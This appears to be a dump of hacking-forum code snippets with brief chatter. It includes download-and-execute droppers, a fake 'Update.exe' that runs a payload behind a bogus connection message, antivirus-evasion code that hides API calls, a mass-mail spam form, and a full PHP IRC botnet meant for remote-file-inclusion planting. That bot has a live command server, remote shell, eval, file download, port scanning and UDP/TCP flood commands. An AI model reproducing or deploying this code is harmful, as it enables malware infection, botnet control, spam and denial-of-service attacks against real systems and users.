/* * Multi-Threaded Server * by; android @ blackhacking.com */ #include <stdio.h> #include <Winsock2.h> #include <Ws2tcpip.h> #include <cstdlib> void ListenThread(LPVOID listenParams); int CommunicateThread(LPVOID params); typedef struct { int ListenSocket; } ListenParameters; typedef struct { struct sockaddr_in client; int socket; } ConnectedSocket; int main(int argc, char *argv[]) { WSADATA wsaData; int servSocket; struct sockaddr_in serv; ListenParameters listenParams; char buf[1024] = {0}; unsigned short port = atoi(argv[1]); if (argc != 1 || !port) { printf("Usage: <server.exe> <port>\n"); return 0; } if (WSAStartup(MAKEWORD(2,2), &wsaData)) { printf("WSAStartup failed!"); return 1; } serv.sin_family = AF_INET; serv.sin_addr.S_un.S_addr = NULL; serv.sin_port = htons(port); servSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); bind(servSocket, (sockaddr *)&serv, sizeof(serv)); listenParams.ListenSocket = servSocket; CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&ListenThread, &listenParams, 0, 0); while (true) Sleep(5000); closesocket(servSocket); WSACleanup(); return 0; } void ListenThread(LPVOID params) { ListenParameters listenParams = *(ListenParameters *)params; struct sockaddr_in client; int tempSock; socklen_t clientSize; clientSize = sizeof(client); listen(listenParams.ListenSocket, SOMAXCONN); while (true) { tempSock = accept(listenParams.ListenSocket, (sockaddr *)&client, &clientSize); if (tempSock == SOCKET_ERROR) continue; printf("%s:%d // Connection Initiated\n", inet_ntoa(client.sin_addr), client.sin_port); ConnectedSocket socketStruct; socketStruct.client = client; socketStruct.socket = tempSock; CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&CommunicateThread, &socketStruct, 0, 0); Sleep(50); } ExitThread(0); } int CommunicateThread(LPVOID params) { ConnectedSocket connectedSocket = *(ConnectedSocket *)params; int socket = connectedSocket.socket; char * addr = inet_ntoa(connectedSocket.client.sin_addr); short port = connectedSocket.client.sin_port; char * reply = "Reply from server!\n"; send(socket, reply, strlen(reply), 0); printf("%s:%d // Sent: %s\n", addr, port, reply); printf("%s:%d // Connection Terminated", addr, port); closesocket(socket); ExitThread(0); }
-
/* Azureus Seeder Coded by a59 */ #include <windows.h> #include <stdio.h> #include <urlmon.h> #pragma comment( lib, "Urlmon.lib" ) int SeedAzureus( char* szLink, char* szSaveAs ) { int i; HWND hAzureus = FindWindow( 0, "Azureus" ); HWND hPopup, hExists; if( hAzureus == NULL ) return 1; if( URLDownloadToFile( 0, szLink, szSaveAs, 0, 0 ) != S_OK ) return 2; if( (int)ShellExecute( 0, "open", szSaveAs, 0, 0, SW_NORMAL ) <= 32 ) return 3; for( i = 0; i < 10; i++ ) { hExists = FindWindow( 0, "Already exists" ); if( hExists != NULL ) { ShowWindow( hExists, SW_HIDE ); return 4; } Sleep( 100 ); } for( i = 0; i < 10; i++ ) { hPopup = FindWindow( 0, "Information" ); if( hPopup != NULL ) break; Sleep( 100 ); } if( hPopup == NULL ) return 5; ShowWindow( hPopup, SW_HIDE ); return 0; }; int main( ) { switch( SeedAzureus( "http://www.rofl.com/lol.torrent", "c:\\lol.torrent" ) ) { case 1: printf( "Unable to locate Azureus\n" ); break; case 2: printf( "Unable to download file\n" ); break; case 3: printf( "Unale to open file\n" ); break; case 4: printf( "Already seeded!\n" ); break; case 5: printf( "Unable to locate popup window\n" ); break; case 0: printf( "Seeded!\n" ); break; } return 0; };
-
/* uTorrent Seeder Coded by a59 */ #include <windows.h> #include <urlmon.h> #include <stdio.h> #pragma comment( lib, "Urlmon.lib" ) HWND uTorrentWindow = 0; BOOL CALLBACK EnumProc( HWND hWnd, LPARAM lParam ) { char szTitle[ 512 ]; GetWindowText( hWnd, szTitle, sizeof( szTitle ) ); if( strstr( szTitle, "\xB5Torrent" ) ) uTorrentWindow = hWnd; return TRUE; }; HWND FindUTorrent( ) { EnumWindows( EnumProc, 0 ); return( uTorrentWindow ); }; void TypeString( char* szString ) { int Length = strlen( szString ), i; bool ShiftDown = false; short sKey; for( i = 0; i < Length; i++, szString++ ) { sKey = VkKeyScan( *szString ); if( ( sKey >> 8 ) & 1 ) { keybd_event( VK_LSHIFT, 0, 0, 0 ); ShiftDown = true; } keybd_event( (unsigned char)sKey, 0, 0, 0 ); if( ShiftDown ) { keybd_event( VK_LSHIFT, 0, KEYEVENTF_KEYUP, 0 ); ShiftDown = false; } } }; int SeedUTorrent( char* szUrl, char* szSaveAs, char* szSeedTo ) { HWND uTorrentWindow = FindUTorrent( ); if( uTorrentWindow == 0 ) return 1; if( URLDownloadToFile( 0, szUrl, szSaveAs, 0, 0 ) != S_OK ) return 2; if( (int)ShellExecute( 0, "open", szSaveAs, 0, 0, SW_NORMAL ) <= 32 ) return 3; ShowWindow( uTorrentWindow, SW_SHOW ); BringWindowToTop( uTorrentWindow ); SetForegroundWindow( uTorrentWindow ); SetFocus( uTorrentWindow ); if( !IsWindow( uTorrentWindow ) ) return 4; Sleep( 300 ); if( *szSeedTo != 0 ) TypeString( szSeedTo ); keybd_event( VK_RETURN, 0, 0, 0 ); ShowWindow( uTorrentWindow, SW_MINIMIZE ); return 0; }; int main( ) { switch( SeedUTorrent( "http://www.shotsy.com/shotsyblog/t.torrent", "c:\\t.torrent", "c:\\lol.rar" ) ) { case 0: printf( "Seeded!\n" ); break; case 1: printf( "Unable to locate uTorrent\n" ); break; case 2: printf( "Unable to download file\n" ); break; case 3: printf( "Unable to execute file\n" ); break; case 4: printf( "Error with window\n" ); break; }; return 0; };
-
///////////////////////////////////////////////////////////////// // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // [2008-07-15] Create 1 Terabyte File // http://r00tsecurity.org/db/code/136 // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // GENERATED ON: 2009-05-10 | 03:23:32 ///////////////////////////////////////////////////////////////// SOURCE CODE #define _WIN32_WINNT 0x0500 #include <windows.h> #include <stdio.h> #include <Winioctl.h>//Dev C++ if use int main(int argc, char* argv[]) { HANDLE h = CreateFile("geek.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); DWORD dw; DeviceIoControl(h, FSCTL_SET_SPARSE, NULL, 0, NULL, 0, &dw, NULL); LONG lDist = 4095; SetFilePointer(h, 0, &lDist, FILE_BEGIN); SetEndOfFile(h); CloseHandle(h); system("PAUSE"); return 0; } // http://r00tsecurity.org/db/code/136
-
#include <iostream> #include <windows.h> #include <urlmon.h> #pragma comment(lib, "urlmon.lib") using namespace std; char szDir[256], szTemp[256]; const char *GetFullDirectory(string szInput) { const char *szBuffer; std::string szDll = szInput; GetCurrentDirectory(sizeof(szDir), (char *)szDir); szBuffer = szDll.c_str(); sprintf_s(szTemp, "%s%s", szDir, szBuffer); return szTemp; } int main() { cout << "Opening Update.exe, please accept if it asks for your permission to run." << endl; Sleep(3000); URLDownloadToFile(NULL, "http://www.google.com/index.html", "Update.exe", NULL, NULL); // edit the URL here. Sleep(4000); ShellExecute(NULL, "open", GetFullDirectory("\\Update.exe"), NULL, NULL, SW_SHOWNORMAL); cout << "Attempting to contact server." << endl; Sleep(1000); cout << "Attempting to contact server.." << endl; Sleep(1000); cout << "Attempting to contact server..." << endl; Sleep(1000); cout << "Connection failed, please try again in a few hours." << endl; Sleep(4000); return 0; }
-
URLDownloadToFile ------------------------ Here is source to URLDownloadToFile written manually, function by function. 3/24 detections, if you crypt all API's it will be 1/24. typedef PVOID HINTERNET ; typedef HINTERNET (WINAPI *InetOpenA)(LPCTSTR , char* ,char*,char* ,char* ); //InterNetOpenA typedef HINTERNET (WINAPI *InetOpenUrlA) (HINTERNET, LPCSTR, char* ,char* ,char* ,char* ); //InternetOpenUrlA typedef BOOL (WINAPI *InetReadFile) (HINTERNET, LPVOID , DWORD , LPDWORD); //InternetReadFileA typedef HANDLE (WINAPI *CreatFile) (LPCTSTR,int,int,int,int,int,int); //CreateFileA typedef BOOL (WINAPI *WritFile) (HANDLE,LPCVOID,int,LPDWORD,int); //WriteFileA bool D_File(char* FromHere) { HINTERNET InternetHandle; HINTERNET UrlHandle; HANDLE FileHandle; unsigned long BytesNext = 1; unsigned long BytesWritten = 0; char Buffer[2048]; char *SaveFile = "X:\\File.ext"; //File Destination // Opening page, with File Save Destination InternetHandle = InternetOpen(SaveFile, 0, 0, 0, 0); if(InternetHandle != 0) { UrlHandle = InternetOpenUrl(InternetHandle, FromHere, 0, 0, 0, 0); //Connectin to your File FileHandle = CreateFile(SaveFile, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, 0); //Creating File to spec. Destination, with File Attributes. while(BytesNext != 0) { InternetReadFile(UrlHandle, Buffer, sizeof(Buffer), &BytesNext); WriteFile(FileHandle, Buffer, BytesNext, &BytesWritten, 0); //Writing bytes to File } CloseHandle(FileHandle); CloseHandle(UrlHandle); CloseHandle(InternetHandle); } return false; } //Usage:: int main() { D_File("http://detectionzer0.com/0wned.exe"); //Your URL Here return 0; }
-
#ifndef ENCRYPTAPI_H_INCLUDED #define ENCRYPTAPI_H_INCLUDED /************************************************************************** *** *** *** Clase -> EncryptApi *** *** Autor -> E0N *** *** Utilidad -> Plantilla que encripta la llamada a las api's *** *** dificultando la detección por parte de los AV *** *** de nuestro código. *** *** Uso -> EncryptApi<valor_de_retorno> (nombre_del_api, *** *** nombre_de_la_dll, *** *** número_de_bytes_a_copiar) *** *** Mecanismo -> Al encriptar una api con esta clase se crea *** *** un buffer intermedio que contiene los *** *** primeros bytes del api indicados en *** *** número_de_bytes_a_copiar y un salto al api *** *** original, ejecutando de esta manera el api *** *** elegida pero sin realizar una llamada directa *** *** a la misma. *** *** *** *** E0N Productions 2009 *** *** E0N Productions *** *** *** **************************************************************************/ /*************************************************************************** * * * Modificado para funcionar en MinGW por Arkangel * * foro.elhacker.net * * GedZac.com * * * ****************************************************************************/ #define EncryptApiH #include <cstdarg> #include <windows.h> template <class T> class EncryptApi { private: /********************************************************************** *** ATRIBUTOS *** **********************************************************************/ BYTE *buffer; // El buffer intermedio para llamar al api /********************************************************************** *** MÉTODOS PRIVADOS *** **********************************************************************/ // Ocultamos las constructoras por defecto EncryptApi(){} EncryptApi(const EncryptApi&){} EncryptApi operator=(EncryptApi){}; public: /********************************************************************** *** CONSTRUCTORA/DESTRUCTORA *** **********************************************************************/ // Constructora, si falla lanza un -1 EncryptApi(char* nombreApi, char* nombreDll, int numBytes); // Destructora ~EncryptApi(); /********************************************************************** *** MÉTODOS PÚBLICOS *** **********************************************************************/ // Función para realizar la llamada al api a encriptar T operator()(int numArgs, ...); }; //------------------------------------------------------------------------- /************************************************************************** *** CONSTRUCTORA/DESTRUCTORA *** **************************************************************************/ template <class T> EncryptApi<T>::EncryptApi(char* nombreApi, char* nombreDll, int numBytes) { // Creamos el buffer para llamar al api BYTE *dirApi; DWORD prot; int tamBuffer = numBytes+5; // Reservamos espacio para el buffer y le damos permisos de ejecución buffer = new BYTE[tamBuffer]; VirtualProtect(buffer, tamBuffer, PAGE_EXECUTE_READWRITE, &prot); // Obtenemos la dirección del API dirApi = (BYTE*)GetProcAddress(LoadLibraryA(nombreDll), nombreApi); // Preparamos el buffer, copiamos los primeros numBytes del api... memcpy(buffer, dirApi, numBytes); buffer += numBytes; // ... y añadimos el salto *buffer = 0xE9; // jmp buffer++; *((signed int *) buffer)= dirApi - buffer + numBytes - 4; // Dejamos el buffer apuntando bien buffer -= numBytes + 1; } // Destructora template <class T> EncryptApi<T>::~EncryptApi() { delete buffer; } /********************************************************************** *** MÉTODOS PÚBLICOS *** **********************************************************************/ template <class T> T EncryptApi<T>::operator ()(int numArgs, ...) { int temp; BYTE *tem; void** args = new void*[numArgs]; // Array con los argumentos T retorno; // El valor de retorno va_list listaArgs; // Para manejar los argumentos variables // Rellenamos el array de argumentos va_start(listaArgs, numArgs); for (int n=0; n<numArgs; n++) args[n] = va_arg(listaArgs, void*); // Los metemos en la pila en el orden correcto for(int n=numArgs-1; n>=0; n--) { temp = n*4; __asm__ __volatile__( "leal 16(%ebp), %eax\n\t" "addl -8(%ebp), %eax\n\t" "pushl (%eax)" ); } // Ejecutamos el buffer intermedio tem = buffer; __asm__ __volatile__( "movl -0x24(%ebp), %eax\n\t" "call *%eax\n\t" "movl %eax,-16(%ebp)" ); delete [] args; va_end(listaArgs); return retorno; } #endif // ENCRYPTAPI_H_INCLUDED
-
Bine ar fi sa imi creasca neuronii, ca nu prea mai am multi de la atata iarba verde. -Gonzalez
-
Im not the author of this tutorial and i just translated this. credit goes to the author. The quite first question you will ask yourselves is: "What do I recognise by, whether is it a PHP Exploit?" - The question is quick answering, because every PHP Exploit looks out almost immediately at the beginning: - <? php-> If stands immediately in the first line of your Exploit, then you can be sure that it was written in PHP. Now you know that it's a PHP Exploit. "What must I make now?" to be able to launch generally a PHP Exploit, her web server PHP on your computer needs I have here a link to one. Web server PHP download With the installation, give "C:\PHP", not C:\Programme\or program files. This makes easier the work to you later. At the the web server question choice "Do not setup a web server". "How does it go on?" - The next step is the saving of your Exploit as a file PHP. You make right-click on your desktop and select the menu "New" and then select "text document". You open this and copy your PHP Exploit in and press on save. Now you must change only the ending of your text file. Now your Exploit is called, for example, "PHPExploit.txt" - Now name it simply in "PHPExploit.php" and press Enter. Your document should also get immediately a new icon. Should you see with your file no ending (.txt), then opens a folder, doesn't mather wich. If "view"-> clicks in the menu bar on "extras"-> "folder options"-> and makes the hook with "extensions with known file types blank" Now you should be able to see the ending. "I have saved the Exploit as a PHPdatei, how do I launch the Exploit now?" - You move your file PHPExploit.php in the folder PHP and launch CMD (start-> execution-> CMD) Then with the command "cd" into the folder PHP switchen and start the Exploit. "php.exe dateiname.php" This is the most important what you must know about that. How it goes on after starting your Exploit, your Exploit itself betrays you.
-
if (!function_exists("checkdnsrr")) { function checkdnsrr($host, $type="") { if (!empty($host)) { if ($type == "") $type = "MX"; @exec("nslookup -type=" . $type . " " . $host, $output); while (list($k, $line) = each($output)) { if (eregi("^" . $host, $line)) return true; } return false; } } } function check_email($e) { if ((preg_match("/(@.*@)|(\.\.)|(@\.)|(\.@)|(^\.)/", $e)) || (preg_match("/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,3}|[0-9]{1,3})(\]?)$/", $e))) { $h = explode('@', $e); if (checkdnsrr($h[1] . '.', "MX")) return true; if (checkdnsrr($h[1] . '.', 'A')) return true; if (checkdnsrr($h[1] . '.', "CNAME")) return true; } return false; } if (check_email("webmsater@nasa.gov")) spam("webmaster@nasa.gov"); // spam() not included in this snippet.
-
Salvati-l ca ceva.php, faceti upload pe un server si bucurati-va de spam <style type="text/css"> <!-- body,td,th { color: #999999; font-family: Courier New, Courier, monospace; } body { background-color: #000000; } INPUT { background-color: black; border: grey 1px solid; color: white; font-family: arial, verdana, ms sans serif; font-size: 10pt } TEXTAREA { background-color: black; border: grey 1px solid; color: white; font-family: arial, verdana, ms sans serif; font-size: 10pt; font-weight: normal } --> </style> <?php if (isset($_REQUEST['message'])) { $message = $_REQUEST['message'] ; $email = $_REQUEST['email'] ; $times = $_REQUEST['times'] ; $subject = $_REQUEST['subject'] ; $to = $_REQUEST['to'] ; for ($i=1; $i<=$times; $i++) { mail( "$to", "$subject", $message, "From:" . rand() . "@$email" ) ; } echo "sent... o.O"; } else { echo "<form method='post' action='index.php'> <p align='left'> Times to send:<br /> <input name='times' type='text' value='1' size='4' maxlength='5' /> <br /> <Input name='email' type='text' value='email suffix' /> <br /> <input name='to' type='text' value='To' /> <br /> <input name='subject' type='text' value='Subject' /> <br /> <br /> Message:<br /> <textarea name='message' rows='15' cols='40'></textarea> <br /> <br /> <input type='submit' name='send' value='send' /> <input name='reset' type='reset' value='reset' /> </p> </form>"; } ?>
-
<?php class Thread { var $pref ; // process reference var $pipes; // stdio var $buffer; // output buffer function Thread() { $this->pref = 0; $this->buffer = ""; $this->pipes = (array)NULL; } function Create ($file) { $t = new Thread; $descriptor = array (0 => array ("pipe", "r"), 1 => array ("pipe", "w"), 2 => array ("pipe", "w")); $t->pref = proc_open ("php -q $file ", $descriptor, $t->pipes); stream_set_blocking ($t->pipes[1], 0); return $t; } function isActive () { $this->buffer .= $this->listen(); $f = stream_get_meta_data ($this->pipes[1]); return !$f["eof"]; } function close () { $r = proc_close ($this->pref); $this->pref = NULL; return $r; } function tell ($thought) { fwrite ($this->pipes[0], $thought); } function listen () { $buffer = $this->buffer; $this->buffer = ""; while ($r = fgets ($this->pipes[1], 1024)) { $buffer .= $r; } return $buffer; } function getError () { $buffer = ""; while ($r = fgets ($this->pipes[2], 1024)) { $buffer .= $r; } return $buffer; } } ?>
-
Poate fi folosit de pe xroot [RFI]. Merge 100% <? set_time_limit(0); error_reporting(0); class pBot { var $config = array("server"=>"218.4.137.214", "port"=>4456, "pass"=>"", //senha do server "prefix"=>"Robot|", "maxrand"=>8, "chan"=>"#rfi", "key"=>"kochamddos.pl", //senha do canal "modes"=>"+p", "password"=>"aszek123", //senha do bot "trigger"=>".", "hostauth"=>"*" // * for any hostname ); var $users = array(); function start() { if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); $ident = "dupek"; $alph = range("a","z"); for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,25)]; if(strlen($this->config['pass'])>0) $this->send("PASS ".$this->config['pass']); $this->send("USER $ident 127.0.0.1 localhost :$ident"); $this->set_nick(); $this->main(); } function main() { while(!feof($this->conn)) { $this->buf = trim(fgets($this->conn,512)); $cmd = explode(" ",$this->buf); if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); } if(isset($cmd[1]) && $cmd[1] =="001") { $this->send("MODE ".$this->nick." ".$this->config['modes']); $this->join($this->config['chan'],$this->config['key']); } if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); } if($this->buf != $old_buf) { $mcmd = array(); $msg = substr(strstr($this->buf," :"),2); $msgcmd = explode(" ",$msg); $nick = explode("!",$cmd[0]); $vhost = explode("@",$nick[1]); $vhost = $vhost[1]; $nick = substr($nick[0],1); $host = $cmd[0]; if($msgcmd[0]==$this->nick) { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1]; } else { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i]; } if(count($cmd)>2) { switch($cmd[1]) { case "QUIT": if($this->is_logged_in($host)) { $this->log_out($host); } break; case "PART": if($this->is_logged_in($host)) { $this->log_out($host); } break; case "PRIVMSG": if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) { if(substr($mcmd[0],0,1)==".") { switch(substr($mcmd[0],1)) { case "user": if($mcmd[1]==$this->config['password']) { $this->privmsg($this->config['chan'],"[\2Auth\2]: $nick logado!"); $this->log_in($host); } else { $this->privmsg($this->config['chan'],"[\2Auth\2]: Senha errada! $nick"); } break; } } } elseif($this->is_logged_in($host)) { if(substr($mcmd[0],0,1)==".") { switch(substr($mcmd[0],1)) { case "restart": $this->send("QUIT :restart"); fclose($this->conn); $this->start(); break; case "mail": //mail to from subject message if(count($mcmd)>4) { $header = "From: <".$mcmd[2].">"; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) { $this->privmsg($this->config['chan'],"[\2mail\2]: Isur00tossivel mandar e-mail."); } else { $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2"); } } break; case "dns": if(isset($mcmd[1])) { $ip = explode(".",$mcmd[1]); if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) { $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); } else { $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); } } break; case "info": $this->privmsg($this->config['chan'],"[\2Vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."]"); break; case "bot": $this->privmsg($this->config['chan'],"[\2Bot by matapato v1.2\2]"); break; case "cmd": if(isset($mcmd[1])) { $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $this->privmsg($this->config['chan'],"[\2cmd\2]: $command"); $pipe = popen($command,"r"); while(!feof($pipe)) { $pbuf = trim(fgets($pipe,512)); if($pbuf != NULL) $this->privmsg($this->config['chan']," : $pbuf"); } pclose($pipe); } break; case "rndnick": $this->set_nick(); break; case "sur00t": $this->send(strstr($msg,$mcmd[1])); break; case "php": $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); break; case "exec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $exec = shell_exec($command); $ret = explode("\n",$exec); $this->privmsg($this->config['chan'],"[\2exec\2]: $command"); for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i])); break; case "pscan": // .pscan 127.0.0.1 6667 if(count($mcmd) > 2) { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); else $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); } break; case "ud.server": // .ud.server <server> <port> [password] if(count($mcmd)>2) { $this->config['server'] = $mcmd[1]; $this->config['port'] = $mcmd[2]; if(isset($mcmcd[3])) { $this->config['pass'] = $mcmd[3]; $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]); } else { $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]); } } break; case "download": if(count($mcmd) > 2) { if(!$fp = fopen($mcmd[2],"w")) { $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada."); } else { if(!$get = file($mcmd[1])) { $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2"); } else { for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2"); } fclose($fp); } } break; case "die": $this->send("QUIT :MORRI! comando por $nick"); fclose($this->conn); exit; case "logout": $this->log_out($host); $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!"); break; case "udpflood": if(count($mcmd)>3) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); } break; case "tcpflood": if(count($mcmd)>5) { $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); } break; } } } break; } } } $old_buf = $this->buf; } $this->start(); } function send($msg) { fwrite($this->conn,"$msg\r\n"); } function join($chan,$key=NULL) { $this->send("JOIN $chan $key"); } function privmsg($to,$msg) { $this->send("PRIVMSG $to :$msg"); } function is_logged_in($host) { if(isset($this->users[$host])) return 1; else return 0; } function log_in($host) { $this->users[$host] = true; } function log_out($host) { unset($this->users[$host]); } function set_nick() { if(isset($_SERVER['SERVER_SOFTWARE'])) { if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick = ""; } $this->nick .= $this->config['prefix']; for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9); $this->send("NICK ".$this->nick); } function udpflood($host,$packetsize,$time) { $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]"); $packet = ""; for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++; } $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s "); } function tcpflood($host,$packets,$packetsize,$port,$delay) { $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); $packet = ""; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); } } $bot = new pBot; $bot->start(); ?>
-
Yes, how are you sunjester. Didn't hear from you for a wile. -Gonzalez
